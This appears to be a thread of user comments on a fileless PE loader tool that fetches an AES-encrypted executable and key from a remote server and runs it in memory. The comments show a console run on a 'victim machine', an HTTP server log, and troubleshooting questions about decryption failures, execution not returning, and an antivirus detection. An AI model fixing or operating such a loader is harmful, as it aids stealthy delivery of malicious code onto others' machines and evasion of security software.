Hello, I've got some problems with decrypt and execute into memory
This is my console output on Victim machine
FilelessPELoader.exe myremoteserverip 8888 cihper.bin key.bin

[+] Get AES Encrypted PE from myremoteserverip:8888

[+] Get AES Key from myremoteserverip:8888

[+] AES PE Address : 000002679DF64CC0

[+] AES Key Address : 000002679DF446A0

[+] Decrypt the PE
Failed in CryptDecrypt (2148073477)

[+] PE Decrypted

[+] Loading and Running PE

On server side I've got this

python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] code 404, message File not found
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] "GET /cihper.bin HTTP/1.1" 404 -
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] "GET /key.bin HTTP/1.1" 200 -

but all required files into one folder. Actually I've already tested it and it worked for me but I deleted my VM...
Could u help me to solve this problem?
I was tested in on Python 3.8.10, Python 3.10.6. OS ubuntu 22 and Windows server 2016

Thanks in advanced!

Hi,

I'm loading a very simple PE file using this loader that only prints hello world but once loaded with this loaded it never returns?
The executable is loaded and i get the output on the screen but it never returns to prompt, or my printf() line after the pe is loaded and executed from memory never gets executed!

How can I make this to return properly once the loaded .exe file is returned?

Thanks

Hello, when I execute on the same machine, the client cannot be connected to the server and the server will automatically interrupt within a few seconds after the server runs. How to solve it?

on windows10pro updated 21 march 2023. :-((
it say : Trojan:Script/Wacatac.B!ml

Please add a requirements.txt file with the following :

hashlib
pycryptodome
pycryptodomex